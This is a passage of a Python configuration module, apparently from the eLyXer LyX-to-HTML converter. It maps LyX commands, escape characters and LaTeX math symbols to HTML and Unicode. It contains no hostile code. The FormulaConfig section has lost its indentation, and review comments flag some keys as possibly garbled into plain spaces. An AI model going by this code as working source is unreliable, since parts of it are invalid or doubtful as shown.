        u'\\begin_inset LatexCommand citet': u'BiblioCitation',
        u'\\begin_inset LatexCommand htmlurl': u'URL',
        u'\\begin_inset LatexCommand index': u'IndexReference',
        u'\\begin_inset LatexCommand label': u'Label',
        u'\\begin_inset LatexCommand nomenclature': u'NomenclatureEntry',
        u'\\begin_inset LatexCommand prettyref': u'Reference',
        u'\\begin_inset LatexCommand printindex': u'PrintIndex',
        u'\\begin_inset LatexCommand printnomenclature': u'PrintNomenclature',
        u'\\begin_inset LatexCommand ref': u'Reference',
        u'\\begin_inset LatexCommand tableofcontents': u'TableOfContents',
        u'\\begin_inset LatexCommand url': u'URL',
        u'\\begin_inset LatexCommand vref': u'Reference',
        u'\\begin_inset Marginal': u'SideNote',
        u'\\begin_inset Newline': u'NewlineInset',
        u'\\begin_inset Newpage': u'NewPageInset', u'\\begin_inset Note': u'Note',
        u'\\begin_inset OptArg': u'ShortTitle',
        u'\\begin_inset Phantom': u'PhantomText',
        u'\\begin_inset Quotes': u'QuoteContainer',
        u'\\begin_inset Tabular': u'Table', u'\\begin_inset Text': u'InsetText',
        u'\\begin_inset VSpace': u'VerticalSpace', u'\\begin_inset Wrap': u'Wrap',
        u'\\begin_inset listings': u'Listing',
        u'\\begin_inset script': u'ScriptInset', u'\\begin_inset space': u'Space',
        u'\\begin_layout': u'Layout', u'\\begin_layout Abstract': u'Abstract',
        u'\\begin_layout Author': u'Author',
        u'\\begin_layout Bibliography': u'Bibliography',
        u'\\begin_layout Chunk': u'NewfangledChunk',
        u'\\begin_layout Description': u'Description',
        u'\\begin_layout Enumerate': u'ListItem',
        u'\\begin_layout Itemize': u'ListItem', u'\\begin_layout List': u'List',
        u'\\begin_layout LyX-Code': u'LyXCode',
        u'\\begin_layout Plain': u'PlainLayout',
        u'\\begin_layout Standard': u'StandardLayout',
        u'\\begin_layout Title': u'Title', u'\\begin_preamble': u'LyXPreamble',
        u'\\change_deleted': u'ChangeDeleted',
        u'\\change_inserted': u'ChangeInserted',
        u'\\change_unchanged': u'BlackBox', u'\\color': u'ColorText',
        u'\\color inherit': u'BlackBox', u'\\color none': u'BlackBox',
        u'\\emph default': u'BlackBox', u'\\emph off': u'BlackBox',
        u'\\emph on': u'EmphaticText', u'\\emph toggle': u'EmphaticText',
        u'\\end_body': u'LyXFooter', u'\\family': u'TextFamily',
        u'\\family default': u'BlackBox', u'\\family roman': u'BlackBox',
        u'\\hfill': u'Hfill', u'\\labelwidthstring': u'BlackBox',
        u'\\lang': u'LangLine', u'\\length': u'InsetLength',
        u'\\lyxformat': u'LyXFormat', u'\\lyxline': u'LyXLine',
        u'\\newline': u'Newline', u'\\newpage': u'NewPage',
        u'\\noindent': u'BlackBox', u'\\noun default': u'BlackBox',
        u'\\noun off': u'BlackBox', u'\\noun on': u'VersalitasText',
        u'\\paragraph_spacing': u'BlackBox', u'\\series bold': u'BoldText',
        u'\\series default': u'BlackBox', u'\\series medium': u'BlackBox',
        u'\\shape': u'ShapedText', u'\\shape default': u'BlackBox',
        u'\\shape up': u'BlackBox', u'\\size': u'SizeText',
        u'\\size normal': u'BlackBox', u'\\start_of_appendix': u'StartAppendix',
        u'\\strikeout default': u'BlackBox', u'\\strikeout on': u'StrikeOut',
    }
    # Prefix that marks a LyX command line.
    string = {
        u'startcommand': u'\\',
    }
    # Header tokens that introduce a LyX table.
    table = {
        u'headers': [u'<lyxtabular', u'<features',],
    }
class EscapeConfig(object):
    """Escape/replacement tables used when rendering text to HTML.

    Each dict maps a literal source string to its replacement in the output.
    """

    # Typographic substitutions for plain text (TeX dashes, curly quotes).
    chars = {
        u'\n': u'', u' -- ': u' — ', u' --- ': u' — ', u'\'': u'’', u'`': u'‘',
    }

    # LyX special-character commands and their output equivalents.
    # NOTE(review): several replacements here are literal space characters;
    # upstream eLyXer uses HTML entities (&nbsp;, &thinsp;) instead —
    # confirm which form this fork intends.
    commands = {
        u'\\InsetSpace \\space{}': u' ', u'\\InsetSpace \\thinspace{}': u' ',
        u'\\InsetSpace ~': u' ', u'\\SpecialChar \\-': u'',
        u'\\SpecialChar \\@.': u'.', u'\\SpecialChar \\ldots{}': u'…',
        u'\\SpecialChar \\menuseparator': u' ▷ ',
        u'\\SpecialChar \\nobreakdash-': u'-', u'\\SpecialChar \\slash{}': u'/',
        u'\\SpecialChar \\textcompwordmark{}': u'', u'\\backslash': u'\\',
    }

    # HTML escaping of markup-significant characters.  These must map to the
    # named entities: the previous identity mapping ('&' -> '&') made HTML
    # escaping a no-op and produced broken markup whenever the source text
    # contained '&', '<' or '>'.
    entities = {
        u'&': u'&amp;', u'<': u'&lt;', u'>': u'&gt;',
    }

    # Rewrite XHTML self-closing tag endings to plain HTML.
    html = {
        u'/>': u'>',
    }

    # Unicode spaces with no ISO-8859-15 representation, replaced by entities
    # (no-break space, em space, four-per-em space); keys restored with
    # explicit escapes as in upstream eLyXer — the previous copy had them
    # collapsed into indistinguishable plain spaces (duplicate dict keys).
    iso885915 = {
        u'\u00a0': u'&nbsp;', u'\u2003': u'&emsp;', u'\u2005': u'&#8197;',
    }

    # Replacement used when Unicode output is not available.
    # NOTE(review): the key here appears to have been garbled to a plain
    # space in this copy — verify against upstream before relying on it.
    nonunicode = {
        u' ': u' ',
    }
class FormulaConfig(object):
"Configuration class from elyxer.config file"
alphacommands = {
u'\\AA': u'Å', u'\\AE': u'Æ',
u'\\AmS': u'<span class="versalitas">AmS</span>', u'\\Angstroem': u'Å',
u'\\DH': u'Ð', u'\\Koppa': u'Ϟ', u'\\L': u'Ł', u'\\Micro': u'µ', u'\\O': u'Ø',
u'\\OE': u'Œ', u'\\Sampi': u'Ϡ', u'\\Stigma': u'Ϛ', u'\\TH': u'Þ',
u'\\aa': u'å', u'\\ae': u'æ', u'\\alpha': u'α', u'\\beta': u'β',
u'\\delta': u'δ', u'\\dh': u'ð', u'\\digamma': u'ϝ', u'\\epsilon': u'ϵ',
u'\\eta': u'η', u'\\eth': u'ð', u'\\gamma': u'γ', u'\\i': u'ı',
u'\\imath': u'ı', u'\\iota': u'ι', u'\\j': u'ȷ', u'\\jmath': u'ȷ',
u'\\kappa': u'κ', u'\\koppa': u'ϟ', u'\\l': u'ł', u'\\lambda': u'λ',
u'\\mu': u'μ', u'\\nu': u'ν', u'\\o': u'ø', u'\\oe': u'œ', u'\\omega': u'ω',
u'\\phi': u'φ', u'\\pi': u'π', u'\\psi': u'ψ', u'\\rho': u'ρ',
u'\\sampi': u'ϡ', u'\\sigma': u'σ', u'\\ss': u'ß', u'\\stigma': u'ϛ',
u'\\tau': u'τ', u'\\tcohm': u'Ω', u'\\textcrh': u'ħ', u'\\th': u'þ',
u'\\theta': u'θ', u'\\upsilon': u'υ', u'\\varDelta': u'∆',
u'\\varGamma': u'Γ', u'\\varLambda': u'Λ', u'\\varOmega': u'Ω',
u'\\varPhi': u'Φ', u'\\varPi': u'Π', u'\\varPsi': u'Ψ', u'\\varSigma': u'Σ',
u'\\varTheta': u'Θ', u'\\varUpsilon': u'Υ', u'\\varXi': u'Ξ',
u'\\varbeta': u'ϐ', u'\\varepsilon': u'ε', u'\\varkappa': u'ϰ',
u'\\varphi': u'φ', u'\\varpi': u'ϖ', u'\\varrho': u'ϱ', u'\\varsigma': u'ς',
u'\\vartheta': u'ϑ', u'\\xi': u'ξ', u'\\zeta': u'ζ',
}
array = {
u'begin': u'\\begin', u'cellseparator': u'&', u'end': u'\\end',
u'rowseparator': u'\\\\',
}
bigbrackets = {
u'(': [u'⎛', u'⎜', u'⎝',], u')': [u'⎞', u'⎟', u'⎠',], u'[': [u'⎡', u'⎢', u'⎣',],
u']': [u'⎤', u'⎥', u'⎦',], u'{': [u'⎧', u'⎪', u'⎨', u'⎩',], u'|': [u'|',],
u'}': [u'⎫', u'⎪', u'⎬', u'⎭',], u'∥': [u'∥',],
}
bigsymbols = {
u'∑': [u'⎲', u'⎳',], u'∫': [u'⌠', u'⌡',],
}
bracketcommands = {
u'\\left': u'span class="symbol"',
u'\\left.': u'<span class="leftdot"></span>',
u'\\middle': u'span class="symbol"', u'\\right': u'span class="symbol"',
u'\\right.': u'<span class="rightdot"></span>',
}
combiningfunctions = {
u'\\"': u'̈', u'\\\'': u'́', u'\\^': u'̂', u'\\`': u'̀', u'\\acute': u'́',
u'\\bar': u'̄', u'\\breve': u'̆', u'\\c': u'̧', u'\\check': u'̌',
u'\\dddot': u'⃛', u'\\ddot': u'̈', u'\\dot': u'̇', u'\\grave': u'̀',
u'\\hat': u'̂', u'\\mathring': u'̊', u'\\overleftarrow': u'⃖',
u'\\overrightarrow': u'⃗', u'\\r': u'̊', u'\\s': u'̩',
u'\\textcircled': u'⃝', u'\\textsubring': u'̥', u'\\tilde': u'̃',
u'\\v': u'̌', u'\\vec': u'⃗', u'\\~': u'̃',
}
commands = {
u'\\ ': u' ', u'\\!': u'', u'\\#': u'#', u'\\$': u'$', u'\\%': u'%',
u'\\&': u'&', u'\\,': u' ', u'\\:': u' ', u'\\;': u' ', u'\\AC': u'∿',
u'\\APLcomment': u'⍝', u'\\APLdownarrowbox': u'⍗', u'\\APLinput': u'⍞',
u'\\APLinv': u'⌹', u'\\APLleftarrowbox': u'⍇', u'\\APLlog': u'⍟',
u'\\APLrightarrowbox': u'⍈', u'\\APLuparrowbox': u'⍐', u'\\Box': u'□',
u'\\Bumpeq': u'≎', u'\\CIRCLE': u'●', u'\\Cap': u'⋒',
u'\\CapitalDifferentialD': u'ⅅ', u'\\CheckedBox': u'☑', u'\\Circle': u'○',
u'\\Coloneqq': u'⩴', u'\\ComplexI': u'ⅈ', u'\\ComplexJ': u'ⅉ',
u'\\Corresponds': u'≙', u'\\Cup': u'⋓', u'\\Delta': u'Δ', u'\\Diamond': u'◇',
u'\\Diamondblack': u'◆', u'\\Diamonddot': u'⟐', u'\\DifferentialD': u'ⅆ',
u'\\Downarrow': u'⇓', u'\\EUR': u'€', u'\\Euler': u'ℇ',
u'\\ExponetialE': u'ⅇ', u'\\Finv': u'Ⅎ', u'\\Game': u'⅁', u'\\Gamma': u'Γ',
u'\\Im': u'ℑ', u'\\Join': u'⨝', u'\\LEFTCIRCLE': u'◖', u'\\LEFTcircle': u'◐',
u'\\LHD': u'◀', u'\\Lambda': u'Λ', u'\\Lbag': u'⟅', u'\\Leftarrow': u'⇐',
u'\\Lleftarrow': u'⇚', u'\\Longleftarrow': u'⟸',
u'\\Longleftrightarrow': u'⟺', u'\\Longrightarrow': u'⟹', u'\\Lparen': u'⦅',
u'\\Lsh': u'↰', u'\\Mapsfrom': u'⇐|', u'\\Mapsto': u'|⇒', u'\\Omega': u'Ω',
u'\\P': u'¶', u'\\Phi': u'Φ', u'\\Pi': u'Π', u'\\Pr': u'Pr', u'\\Psi': u'Ψ',
u'\\Qoppa': u'Ϙ', u'\\RHD': u'▶', u'\\RIGHTCIRCLE': u'◗',
u'\\RIGHTcircle': u'◑', u'\\Rbag': u'⟆', u'\\Re': u'ℜ', u'\\Rparen': u'⦆',
u'\\Rrightarrow': u'⇛', u'\\Rsh': u'↱', u'\\S': u'§', u'\\Sigma': u'Σ',
u'\\Square': u'☐', u'\\Subset': u'⋐', u'\\Sun': u'☉', u'\\Supset': u'⋑',
u'\\Theta': u'Θ', u'\\Uparrow': u'⇑', u'\\Updownarrow': u'⇕',
u'\\Upsilon': u'Υ', u'\\Vdash': u'⊩', u'\\Vert': u'∥', u'\\Vvdash': u'⊪',
u'\\XBox': u'☒', u'\\Xi': u'Ξ', u'\\Yup': u'⅄', u'\\\\': u'<br/>',
u'\\_': u'_', u'\\aleph': u'ℵ', u'\\amalg': u'∐', u'\\anchor': u'⚓',
u'\\angle': u'∠', u'\\aquarius': u'♒', u'\\arccos': u'arccos',
u'\\arcsin': u'arcsin', u'\\arctan': u'arctan', u'\\arg': u'arg',
u'\\aries': u'♈', u'\\arrowbullet': u'➢', u'\\ast': u'∗', u'\\asymp': u'≍',
u'\\backepsilon': u'∍', u'\\backprime': u'‵', u'\\backsimeq': u'⋍',
u'\\backslash': u'\\', u'\\ballotx': u'✗', u'\\barwedge': u'⊼',
u'\\because': u'∵', u'\\beth': u'ℶ', u'\\between': u'≬', u'\\bigcap': u'∩',
u'\\bigcirc': u'○', u'\\bigcup': u'∪', u'\\bigodot': u'⊙',
u'\\bigoplus': u'⊕', u'\\bigotimes': u'⊗', u'\\bigsqcup': u'⊔',
u'\\bigstar': u'★', u'\\bigtriangledown': u'▽', u'\\bigtriangleup': u'△',
u'\\biguplus': u'⊎', u'\\bigvee': u'∨', u'\\bigwedge': u'∧',
u'\\biohazard': u'☣', u'\\blacklozenge': u'⧫', u'\\blacksmiley': u'☻',
u'\\blacksquare': u'■', u'\\blacktriangle': u'▲',
u'\\blacktriangledown': u'▼', u'\\blacktriangleleft': u'◂',
u'\\blacktriangleright': u'▶', u'\\blacktriangleup': u'▴', u'\\bot': u'⊥',
u'\\bowtie': u'⋈', u'\\box': u'▫', u'\\boxast': u'⧆', u'\\boxbar': u'◫',
u'\\boxbox': u'⧈', u'\\boxbslash': u'⧅', u'\\boxcircle': u'⧇',
u'\\boxdot': u'⊡', u'\\boxminus': u'⊟', u'\\boxplus': u'⊞',
u'\\boxslash': u'⧄', u'\\boxtimes': u'⊠', u'\\bullet': u'•',
u'\\bumpeq': u'≏', u'\\cancer': u'♋', u'\\cap': u'∩', u'\\capricornus': u'♑',
u'\\cat': u'⁀', u'\\cdot': u'⋅', u'\\cdots': u'⋯', u'\\cent': u'¢',
u'\\centerdot': u'∙', u'\\checkmark': u'✓', u'\\chi': u'χ', u'\\circ': u'∘',
u'\\circeq': u'≗', u'\\circlearrowleft': u'↺', u'\\circlearrowright': u'↻',
u'\\circledR': u'®', u'\\circledast': u'⊛', u'\\circledbslash': u'⦸',
u'\\circledcirc': u'⊚', u'\\circleddash': u'⊝', u'\\circledgtr': u'⧁',
u'\\circledless': u'⧀', u'\\clubsuit': u'♣', u'\\colon': u': ', u'\\coloneqq': u'≔',
u'\\complement': u'∁', u'\\cong': u'≅', u'\\coprod': u'∐',
u'\\copyright': u'©', u'\\cos': u'cos', u'\\cosh': u'cosh', u'\\cot': u'cot',
u'\\coth': u'coth', u'\\csc': u'csc', u'\\cup': u'∪', u'\\curlyvee': u'⋎',
u'\\curlywedge': u'⋏', u'\\curvearrowleft': u'↶',
u'\\curvearrowright': u'↷', u'\\dag': u'†', u'\\dagger': u'†',
u'\\daleth': u'ℸ', u'\\dashleftarrow': u'⇠', u'\\dashv': u'⊣',
u'\\ddag': u'‡', u'\\ddagger': u'‡', u'\\ddots': u'⋱', u'\\deg': u'deg',
u'\\det': u'det', u'\\diagdown': u'╲', u'\\diagup': u'╱',
u'\\diameter': u'⌀', u'\\diamond': u'◇', u'\\diamondsuit': u'♦',
u'\\dim': u'dim', u'\\div': u'÷', u'\\divideontimes': u'⋇',
u'\\dotdiv': u'∸', u'\\doteq': u'≐', u'\\doteqdot': u'≑', u'\\dotplus': u'∔',
u'\\dots': u'…', u'\\doublebarwedge': u'⌆', u'\\downarrow': u'↓',
u'\\downdownarrows': u'⇊', u'\\downharpoonleft': u'⇃',
u'\\downharpoonright': u'⇂', u'\\dsub': u'⩤', u'\\earth': u'♁',
u'\\eighthnote': u'♪', u'\\ell': u'ℓ', u'\\emptyset': u'∅',
u'\\eqcirc': u'≖', u'\\eqcolon': u'≕', u'\\eqsim': u'≂', u'\\euro': u'€',
u'\\exists': u'∃', u'\\exp': u'exp', u'\\fallingdotseq': u'≒',
u'\\fcmp': u'⨾', u'\\female': u'♀', u'\\flat': u'♭', u'\\forall': u'∀',
u'\\fourth': u'⁗', u'\\frown': u'⌢', u'\\frownie': u'☹', u'\\gcd': u'gcd',
u'\\gemini': u'♊', u'\\geq)': u'≥', u'\\geqq': u'≧', u'\\geqslant': u'≥',
u'\\gets': u'←', u'\\gg': u'≫', u'\\ggg': u'⋙', u'\\gimel': u'ℷ',
u'\\gneqq': u'≩', u'\\gnsim': u'⋧', u'\\gtrdot': u'⋗', u'\\gtreqless': u'⋚',
u'\\gtreqqless': u'⪌', u'\\gtrless': u'≷', u'\\gtrsim': u'≳',
u'\\guillemotleft': u'«', u'\\guillemotright': u'»', u'\\hbar': u'ℏ',
u'\\heartsuit': u'♥', u'\\hfill': u'<span class="hfill"> </span>',
u'\\hom': u'hom', u'\\hookleftarrow': u'↩', u'\\hookrightarrow': u'↪',
u'\\hslash': u'ℏ', u'\\idotsint': u'<span class="bigsymbol">∫⋯∫</span>',
u'\\iiint': u'<span class="bigsymbol">∭</span>',
u'\\iint': u'<span class="bigsymbol">∬</span>', u'\\imath': u'ı',
u'\\inf': u'inf', u'\\infty': u'∞', u'\\intercal': u'⊺',
u'\\interleave': u'⫴', u'\\invamp': u'⅋', u'\\invneg': u'⌐',
u'\\jmath': u'ȷ', u'\\jupiter': u'♃', u'\\ker': u'ker', u'\\land': u'∧',
u'\\landupint': u'<span class="bigsymbol">∱</span>', u'\\lang': u'⟪',
u'\\langle': u'⟨', u'\\lblot': u'⦉', u'\\lbrace': u'{', u'\\lbrace)': u'{',
u'\\lbrack': u'[', u'\\lceil': u'⌈', u'\\ldots': u'…', u'\\leadsto': u'⇝',
u'\\leftarrow)': u'←', u'\\leftarrowtail': u'↢', u'\\leftarrowtobar': u'⇤',
u'\\leftharpoondown': u'↽', u'\\leftharpoonup': u'↼',
u'\\leftleftarrows': u'⇇', u'\\leftleftharpoons': u'⥢', u'\\leftmoon': u'☾',
u'\\leftrightarrow': u'↔', u'\\leftrightarrows': u'⇆',
u'\\leftrightharpoons': u'⇋', u'\\leftthreetimes': u'⋋', u'\\leo': u'♌',
u'\\leq)': u'≤', u'\\leqq': u'≦', u'\\leqslant': u'≤', u'\\lessdot': u'⋖',
u'\\lesseqgtr': u'⋛', u'\\lesseqqgtr': u'⪋', u'\\lessgtr': u'≶',
u'\\lesssim': u'≲', u'\\lfloor': u'⌊', u'\\lg': u'lg', u'\\lgroup': u'⟮',
u'\\lhd': u'⊲', u'\\libra': u'♎', u'\\lightning': u'↯', u'\\limg': u'⦇',
u'\\liminf': u'liminf', u'\\limsup': u'limsup', u'\\ll': u'≪',
u'\\llbracket': u'⟦', u'\\llcorner': u'⌞', u'\\lll': u'⋘', u'\\ln': u'ln',
u'\\lneqq': u'≨', u'\\lnot': u'¬', u'\\lnsim': u'⋦', u'\\log': u'log',
u'\\longleftarrow': u'⟵', u'\\longleftrightarrow': u'⟷',
u'\\longmapsto': u'⟼', u'\\longrightarrow': u'⟶', u'\\looparrowleft': u'↫',
u'\\looparrowright': u'↬', u'\\lor': u'∨', u'\\lozenge': u'◊',
u'\\lrcorner': u'⌟', u'\\ltimes': u'⋉', u'\\lyxlock': u'', u'\\male': u'♂',
u'\\maltese': u'✠', u'\\mapsfrom': u'↤', u'\\mapsto': u'↦',
u'\\mathcircumflex': u'^', u'\\max': u'max', u'\\measuredangle': u'∡',
u'\\medbullet': u'⚫', u'\\medcirc': u'⚪', u'\\mercury': u'☿', u'\\mho': u'℧',
u'\\mid': u'∣', u'\\min': u'min', u'\\models': u'⊨', u'\\mp': u'∓',
u'\\multimap': u'⊸', u'\\nLeftarrow': u'⇍', u'\\nLeftrightarrow': u'⇎',
u'\\nRightarrow': u'⇏', u'\\nVDash': u'⊯', u'\\nabla': u'∇',
u'\\napprox': u'≉', u'\\natural': u'♮', u'\\ncong': u'≇', u'\\nearrow': u'↗',
u'\\neg': u'¬', u'\\neg)': u'¬', u'\\neptune': u'♆', u'\\nequiv': u'≢',
u'\\newline': u'<br/>', u'\\nexists': u'∄', u'\\ngeqslant': u'≱',
u'\\ngtr': u'≯', u'\\ngtrless': u'≹', u'\\ni': u'∋', u'\\ni)': u'∋',
u'\\nleftarrow': u'↚', u'\\nleftrightarrow': u'↮', u'\\nleqslant': u'≰',
u'\\nless': u'≮', u'\\nlessgtr': u'≸', u'\\nmid': u'∤', u'\\nolimits': u'',
u'\\nonumber': u'', u'\\not': u'¬', u'\\not<': u'≮', u'\\not=': u'≠',
u'\\not>': u'≯', u'\\notbackslash': u'⍀', u'\\notin': u'∉', u'\\notni': u'∌',
u'\\notslash': u'⌿', u'\\nparallel': u'∦', u'\\nprec': u'⊀',
u'\\nrightarrow': u'↛', u'\\nsim': u'≁', u'\\nsimeq': u'≄',
u'\\nsqsubset': u'⊏̸', u'\\nsubseteq': u'⊈', u'\\nsucc': u'⊁',
u'\\nsucccurlyeq': u'⋡', u'\\nsupset': u'⊅', u'\\nsupseteq': u'⊉',
u'\\ntriangleleft': u'⋪', u'\\ntrianglelefteq': u'⋬',
u'\\ntriangleright': u'⋫', u'\\ntrianglerighteq': u'⋭', u'\\nvDash': u'⊭',
u'\\nvdash': u'⊬', u'\\nwarrow': u'↖', u'\\odot': u'⊙',
u'\\officialeuro': u'€', u'\\oiiint': u'<span class="bigsymbol">∰</span>',
u'\\oiint': u'<span class="bigsymbol">∯</span>',
u'\\oint': u'<span class="bigsymbol">∮</span>',
u'\\ointclockwise': u'<span class="bigsymbol">∲</span>',
u'\\ointctrclockwise': u'<span class="bigsymbol">∳</span>',
u'\\ominus': u'⊖', u'\\oplus': u'⊕', u'\\oslash': u'⊘', u'\\otimes': u'⊗',
u'\\owns': u'∋', u'\\parallel': u'∥', u'\\partial': u'∂', u'\\pencil': u'✎',
u'\\perp': u'⊥', u'\\pisces': u'♓', u'\\pitchfork': u'⋔', u'\\pluto': u'♇',
u'\\pm': u'±', u'\\pointer': u'➪', u'\\pointright': u'☞', u'\\pounds': u'£',
u'\\prec': u'≺', u'\\preccurlyeq': u'≼', u'\\preceq': u'≼',
u'\\precsim': u'≾', u'\\prime': u'′', u'\\prompto': u'∝', u'\\qoppa': u'ϙ',
u'\\qquad': u' ', u'\\quad': u' ', u'\\quarternote': u'♩',
u'\\radiation': u'☢', u'\\rang': u'⟫', u'\\rangle': u'⟩', u'\\rblot': u'⦊',
u'\\rbrace': u'}', u'\\rbrace)': u'}', u'\\rbrack': u']', u'\\rceil': u'⌉',
u'\\recycle': u'♻', u'\\rfloor': u'⌋', u'\\rgroup': u'⟯', u'\\rhd': u'⊳',
u'\\rightangle': u'∟', u'\\rightarrow)': u'→', u'\\rightarrowtail': u'↣',
u'\\rightarrowtobar': u'⇥', u'\\rightharpoondown': u'⇁',
u'\\rightharpoonup': u'⇀', u'\\rightharpooondown': u'⇁',
u'\\rightharpooonup': u'⇀', u'\\rightleftarrows': u'⇄',
u'\\rightleftharpoons': u'⇌', u'\\rightmoon': u'☽',
u'\\rightrightarrows': u'⇉', u'\\rightrightharpoons': u'⥤',
u'\\rightthreetimes': u'⋌', u'\\rimg': u'⦈', u'\\risingdotseq': u'≓',
u'\\rrbracket': u'⟧', u'\\rsub': u'⩥', u'\\rtimes': u'⋊',
u'\\sagittarius': u'♐', u'\\saturn': u'♄', u'\\scorpio': u'♏',
u'\\searrow': u'↘', u'\\sec': u'sec', u'\\second': u'″', u'\\setminus': u'∖',
u'\\sharp': u'♯', u'\\simeq': u'≃', u'\\sin': u'sin', u'\\sinh': u'sinh',
u'\\sixteenthnote': u'♬', u'\\skull': u'☠', u'\\slash': u'∕',
u'\\smallsetminus': u'∖', u'\\smalltriangledown': u'▿',
u'\\smalltriangleleft': u'◃', u'\\smalltriangleright': u'▹',
u'\\smalltriangleup': u'▵', u'\\smile': u'⌣', u'\\smiley': u'☺',
u'\\spadesuit': u'♠', u'\\spddot': u'¨', u'\\sphat': u'',
u'\\sphericalangle': u'∢', u'\\spot': u'⦁', u'\\sptilde': u'~',
u'\\sqcap': u'⊓', u'\\sqcup': u'⊔', u'\\sqsubset': u'⊏',
u'\\sqsubseteq': u'⊑', u'\\sqsupset': u'⊐', u'\\sqsupseteq': u'⊒',
u'\\square': u'□', u'\\sslash': u'⫽', u'\\star': u'⋆', u'\\steaming': u'☕',
u'\\subseteqq': u'⫅', u'\\subsetneqq': u'⫋', u'\\succ': u'≻',
u'\\succcurlyeq': u'≽', u'\\succeq': u'≽', u'\\succnsim': u'⋩',
u'\\succsim': u'≿', u'\\sun': u'☼', u'\\sup': u'sup', u'\\supseteqq': u'⫆',
u'\\supsetneqq': u'⫌', u'\\surd': u'√', u'\\swarrow': u'↙',
u'\\swords': u'⚔', u'\\talloblong': u'⫾', u'\\tan': u'tan',
u'\\tanh': u'tanh', u'\\taurus': u'♉', u'\\textasciicircum': u'^',
u'\\textasciitilde': u'~', u'\\textbackslash': u'\\',
u'\\textcopyright': u'©\'', u'\\textdegree': u'°', u'\\textellipsis': u'…',
u'\\textemdash': u'—', u'\\textendash': u'—', u'\\texteuro': u'€',
u'\\textgreater': u'>', u'\\textless': u'<', u'\\textordfeminine': u'ª',
u'\\textordmasculine': u'º', u'\\textquotedblleft': u'“',
u'\\textquotedblright': u'”', u'\\textquoteright': u'’',
u'\\textregistered': u'®', u'\\textrightarrow': u'→',
u'\\textsection': u'§', u'\\texttrademark': u'™',
u'\\texttwosuperior': u'²', u'\\textvisiblespace': u' ',
u'\\therefore': u'∴', u'\\third': u'‴', u'\\top': u'⊤', u'\\triangle': u'△',
u'\\triangleleft': u'⊲', u'\\trianglelefteq': u'⊴', u'\\triangleq': u'≜',
u'\\triangleright': u'▷', u'\\trianglerighteq': u'⊵',
u'\\twoheadleftarrow': u'↞', u'\\twoheadrightarrow': u'↠',
u'\\twonotes': u'♫', u'\\udot': u'⊍', u'\\ulcorner': u'⌜', u'\\unlhd': u'⊴',
u'\\unrhd': u'⊵', u'\\unrhl': u'⊵', u'\\uparrow': u'↑',
u'\\updownarrow': u'↕', u'\\upharpoonleft': u'↿', u'\\upharpoonright': u'↾',
u'\\uplus': u'⊎', u'\\upuparrows': u'⇈', u'\\uranus': u'♅',
u'\\urcorner': u'⌝', u'\\vDash': u'⊨', u'\\varclubsuit': u'♧',
u'\\vardiamondsuit': u'♦', u'\\varheartsuit': u'♥', u'\\varnothing': u'∅',
u'\\varspadesuit': u'♤', u'\\vdash': u'⊢', u'\\vdots': u'⋮', u'\\vee': u'∨',
u'\\vee)': u'∨', u'\\veebar': u'⊻', u'\\vert': u'∣', u'\\virgo': u'♍',
u'\\warning': u'⚠', u'\\wasylozenge': u'⌑', u'\\wedge': u'∧',
u'\\wedge)': u'∧', u'\\wp': u'℘', u'\\wr': u'≀', u'\\yen': u'¥',
u'\\yinyang': u'☯', u'\\{': u'{', u'\\|': u'∥', u'\\}': u'}',
}
decoratedcommand = {
}
decoratingfunctions = {
u'\\overleftarrow': u'⟵', u'\\overrightarrow': u'⟶', u'\\widehat': u'^',
}
endings = {
u'bracket': u'}', u'complex': u'\\]', u'endafter': u'}',
u'endbefore': u'\\end{', u'squarebracket': u']',
}
environments = {
u'align': [u'r', u'l',], u'eqnarray': [u'r', u'c', u'l',],
u'gathered': [u'l', u'l',],
}
fontfunctions = {
u'\\boldsymbol': u'b', u'\\mathbb': u'span class="blackboard"',
u'\\mathbb{A}': u'𝔸', u'\\mathbb{B}': u'𝔹', u'\\mathbb{C}': u'ℂ',
u'\\mathbb{D}': u'𝔻', u'\\mathbb{E}': u'𝔼', u'\\mathbb{F}': u'𝔽',
u'\\mathbb{G}': u'𝔾', u'\\mathbb{H}': u'ℍ', u'\\mathbb{J}': u'𝕁',
u'\\mathbb{K}': u'𝕂', u'\\mathbb{L}': u'𝕃', u'\\mathbb{N}': u'ℕ',
u'\\mathbb{O}': u'𝕆', u'\\mathbb{P}': u'ℙ', u'\\mathbb{Q}': u'ℚ',
u'\\mathbb{R}': u'ℝ', u'\\mathbb{S}': u'𝕊', u'\\mathbb{T}': u'𝕋',
u'\\mathbb{W}': u'𝕎', u'\\mathbb{Z}': u'ℤ', u'\\mathbf': u'b',
u'\\mathcal': u'span class="scriptfont"', u'\\mathcal{B}': u'ℬ',
u'\\mathcal{E}': u'ℰ', u'\\mathcal{F}': u'ℱ', u'\\mathcal{H}': u'ℋ',
u'\\mathcal{I}': u'ℐ', u'\\mathcal{L}': u'ℒ', u'\\mathcal{M}': u'ℳ',
u'\\mathcal{R}': u'ℛ', u'\\mathfrak': u'span class="fraktur"',
u'\\mathfrak{C}': u'ℭ', u'\\mathfrak{F}': u'𝔉', u'\\mathfrak{H}': u'ℌ',
u'\\mathfrak{I}': u'ℑ', u'\\mathfrak{R}': u'ℜ', u'\\mathfrak{Z}': u'ℨ',
u'\\mathit': u'i', u'\\mathring{A}': u'Å', u'\\mathring{U}': u'Ů',
u'\\mathring{a}': u'å', u'\\mathring{u}': u'ů', u'\\mathring{w}': u'ẘ',
u'\\mathring{y}': u'ẙ', u'\\mathrm': u'span class="mathrm"',
u'\\mathscr': u'span class="scriptfont"', u'\\mathscr{B}': u'ℬ',
u'\\mathscr{E}': u'ℰ', u'\\mathscr{F}': u'ℱ', u'\\mathscr{H}': u'ℋ',
u'\\mathscr{I}': u'ℐ', u'\\mathscr{L}': u'ℒ', u'\\mathscr{M}': u'ℳ',
u'\\mathscr{R}': u'ℛ', u'\\mathsf': u'span class="mathsf"',
u'\\mathtt': u'tt',
}
hybridfunctions = {
u'\\addcontentsline': [u'{$p!}{$q!}{$r!}', u'f0{}', u'ignored',],
u'\\addtocontents': [u'{$p!}{$q!}', u'f0{}', u'ignored',],
u'\\backmatter': [u'', u'f0{}', u'ignored',],
u'\\binom': [u'{$1}{$2}', u'f2{(}f0{f1{$1}f1{$2}}f2{)}', u'span class="binom"', u'span class="binomstack"', u'span class="bigsymbol"',],
u'\\boxed': [u'{$1}', u'f0{$1}', u'span class="boxed"',],
u'\\cfrac': [u'[$p!]{$1}{$2}', u'f0{f3{(}f1{$1}f3{)/(}f2{$2}f3{)}}', u'span class="fullfraction"', u'span class="numerator align-$p"', u'span class="denominator"', u'span class="ignored"',],
